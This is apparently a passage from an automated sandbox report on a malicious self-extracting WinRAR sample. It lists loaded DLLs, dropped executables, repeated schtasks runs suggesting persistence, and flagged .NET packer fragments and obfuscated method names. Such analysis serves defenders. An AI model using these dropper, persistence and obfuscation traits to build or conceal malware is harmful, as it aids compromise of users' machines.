            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: version.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: wldp.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: profapi.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: amsi.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: userenv.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: propsys.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: edputil.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: netutils.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: slc.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: sppc.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: mscoree.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: apphelp.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: version.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: uxtheme.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: windows.storage.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: wldp.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: profapi.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: cryptsp.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: rsaenh.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: cryptbase.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: hx1hwVZIjy.exeStatic file information: File size 1165442 > 1048576
            Source: hx1hwVZIjy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: hx1hwVZIjy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: hx1hwVZIjy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: hx1hwVZIjy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: hx1hwVZIjy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: hx1hwVZIjy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: hx1hwVZIjy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: hx1hwVZIjy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: hx1hwVZIjy.exe
            Source: hx1hwVZIjy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: hx1hwVZIjy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: hx1hwVZIjy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: hx1hwVZIjy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: hx1hwVZIjy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, Uy48Bwq9FymnVapyP1i.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, Uy48Bwq9FymnVapyP1i.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            .NET source code contains potential unpacker
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, j8eAhRa4LD1CKXA25bK.cs.Net Code: cmwQC6uwnQ System.AppDomain.Load(byte[])
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, j8eAhRa4LD1CKXA25bK.cs.Net Code: cmwQC6uwnQ System.Reflection.Assembly.Load(byte[])
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, j8eAhRa4LD1CKXA25bK.cs.Net Code: cmwQC6uwnQ
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, j8eAhRa4LD1CKXA25bK.cs.Net Code: cmwQC6uwnQ System.AppDomain.Load(byte[])
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, j8eAhRa4LD1CKXA25bK.cs.Net Code: cmwQC6uwnQ System.Reflection.Assembly.Load(byte[])
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, j8eAhRa4LD1CKXA25bK.cs.Net Code: cmwQC6uwnQ
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeFile created: C:\ReviewHost\__tmp_rar_sfx_access_check_5247234Jump to behavior
            Source: hx1hwVZIjy.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F4E28C push eax; ret 0_2_00F4E2AA
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F4ED46 push ecx; ret 0_2_00F4ED59
            Source: C:\ReviewHost\brokercrt.exeCode function: 5_2_00007FF848F100BD pushad ; iretd 5_2_00007FF848F100C1
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeCode function: 35_2_00007FF848F300BD pushad ; iretd 35_2_00007FF848F300C1
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeCode function: 37_2_00007FF848F000BD pushad ; iretd 37_2_00007FF848F000C1
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, vnCHqHm6kXEmGFp6Wuw.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'FmtUAarNBf1C05oMQs7', 'j8cFsRrDlBYQeYWFQ6l', 'qiKD1arg5wCqQC3MTel', 'XKYVq7rCPT9VUkU2n8C', 'AM1eKBrquOcYpogES27', 'V6J5BqrVGs6l6tJJMmu'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, Wfn2bcmhbKTlVo0H9hd.csHigh entropy of concatenated method names: 'd5C8NqCqIm', 'U9237R1ynAgxCuvMQAK', 'N8Z4Gl192rorKY9xtlG', 'c0vobW1L9Pld4XwAtyT', 'Wgyv341nNGpA3n9xjxe', 'CrfZqk1OOFC0JBKaRyk', 'QLw', 'YZ8', 'cC5', 'G9C'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, QotFw60KFwuSiKwGc0W.csHigh entropy of concatenated method names: 'PnvgtnMWG1', 'jpqgJKp8Px', 'vOWgYUWxpJ', 'guTg5JbAOV', 'u57gXJ0uBw', 'bSXgpOMgiB', 'x6Sg02ah0D', 'Rlyg2DwkG6', 'K7ZgsN1BnG', 'Jl5gASLY5U'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, Uy48Bwq9FymnVapyP1i.csHigh entropy of concatenated method names: 'cF958u5OZeGK9ll0yUB', 'teiP0i5NUlSGwBWpWjv', 'Tsdliq5y3aR4xyMRry4', 'avYGC6599jMs7m9A3WE', 'ID8GCiNTYC', 'uGbGrL5CafyP1duMigL', 'sKw8Pk5qEm9jnTmgCFW', 'ACm2jG5Vl0YY7yVX6kb', 'tnJBcn5XsZCc0xf2trf', 'tpAB185PKqV2eGnR3cZ'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, kcfvWVm5GjT7Ex2JtZ9.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'TxP32Yr3hN2dTV9cxH2', 'xXqAlfrwYZ20mZ74Wh9', 'N0a0PirZ4YTWGMFZvs3', 'UDOUknr6tgERQPqotJ4', 'cSv4LnrQUjp6w1FTwih', 'm2C63qrUnWlwmGI19KA'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, NxRHjYguZSjAbikVLkw.csHigh entropy of concatenated method names: 'Dn4CxxyDml', 'UmLCMoLVQK', 'vbpCWVU1CJ', 'JB2CjsrxYj', 'v0OCS5VBVA', 'avXCa91lCk', 'RNKC6nNOT4', 'zw9CUkoikv', 'uiRCr2cPK3', 'yWlC1dJ1ae'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, R7HQWZvvvsbXH26HiL.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'dcNfMERMkjjGrVOApaU', 'rfdJwkR8Qf5bEmJaYNd', 'rVtVc9RoS8agy1YxV5f', 'VI2XDKRToaCobMguwPc', 'Shc9OkRi6BVL56TLklA', 'CgAhKxRA8XD4PtvVO1I'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, PWURjHahk5NpeY7H55F.csHigh entropy of concatenated method names: 'jYSJmjepo8', 'ECsIWKaibu9YD2bwBQT', 'WtSwhZaAVCBxDNuY3QI', 'wH3qO8ao0O0u0K444Le', 'BtnxypaTBiqsvibvdQD', 'pgdM1ZazOXVwPM7R8RY', 'sMoxI4Su20JwPjtosbh', 'EmGoYXSv0MYuB6QKj1h', 'qBnXO7SbribdOL8q3Fr', 'oXjrgeSJ6wQYljjn3R4'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, hkPU9DF7lvaIiDDnQnm.csHigh entropy of concatenated method names: 'CFFpTLF2rc', 'Ad1ph76gMp', 'MTRpHjYR56', 'aF4BlIHQJXhNGyCCdL7', 'PbqGULHZc9D7pR5oEnX', 'h2q3NEH6nf38BJ5LGu5', 'YGDeJEHU8gigqrEJxx6', 'N3HpYvBihe', 'oaxp5XW2A9', 'Qc4pXhwXrQ'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, IKgGiT02SGSoXMhlwuR.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'f93goSsxxo', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, LhnSxbmW1eVEZAlUlrt.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'puZlOXEVA040K6Xc89y', 'OYrm7CEXVautwmCOyNd', 'aVhvhvEPAY0ecnWswxa', 't62M8QEGTnqpVToTEkd', 'DlxKjpEld1qayJWIbxx', 'Bbt7LgEjdITayxnQy8I'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, vunj0gFZoPiJREnWYGW.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'SOHXjUiX8I', 'IcP0taYY5E', 'puFXnKO6NO', 'SQfkHInB1AttPxatn9M', 'cTeNO4n0j6v4ljRP5xl', 'cvBlKXn747MbQPitb4o', 'Ltfo6wnenVsa6TSUmCn', 'RgAjtina0bh2dNrVlc1'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, O6Lde7MxNWUZ7Z4PcQf.csHigh entropy of concatenated method names: 'N3lmqkrs5B', '_1kO', '_9v4', '_294', 'qYBmo3Yc6y', 'euj', 'wiem9IB5rj', 'sRymgOyu6S', 'o87', 'rPkmwwCoTj'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, oKn8xpg4clKunhPgvJK.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, mUvl9jmsNmuXm7xGaPU.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'oEL0Vutyt43HupaSpBR', 'VsdICSt96LRKMXhSbB4', 'GaKbuKtORcUoGltJr2H', 'Kt5IuCtNVkZNpioiGaC', 'iI8qhFtDnImhrjjx5Hw', 'NuOgdwtgAX0s3UxmYQv'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, j8eAhRa4LD1CKXA25bK.csHigh entropy of concatenated method names: 'c7tQK0Rbvb', 'YiWQOnbAun', 'ibtQMpAvA9', 'FCPQWPYogG', 'xCVQjsLdQr', 'lDtQSu2hce', 'AURQah9eXv', 'CriSwsByGebdqo6JLG6', 'eb2SdKBLBKa1dcFPAVh', 'zqYUArBnR7tKhTWQmQK'
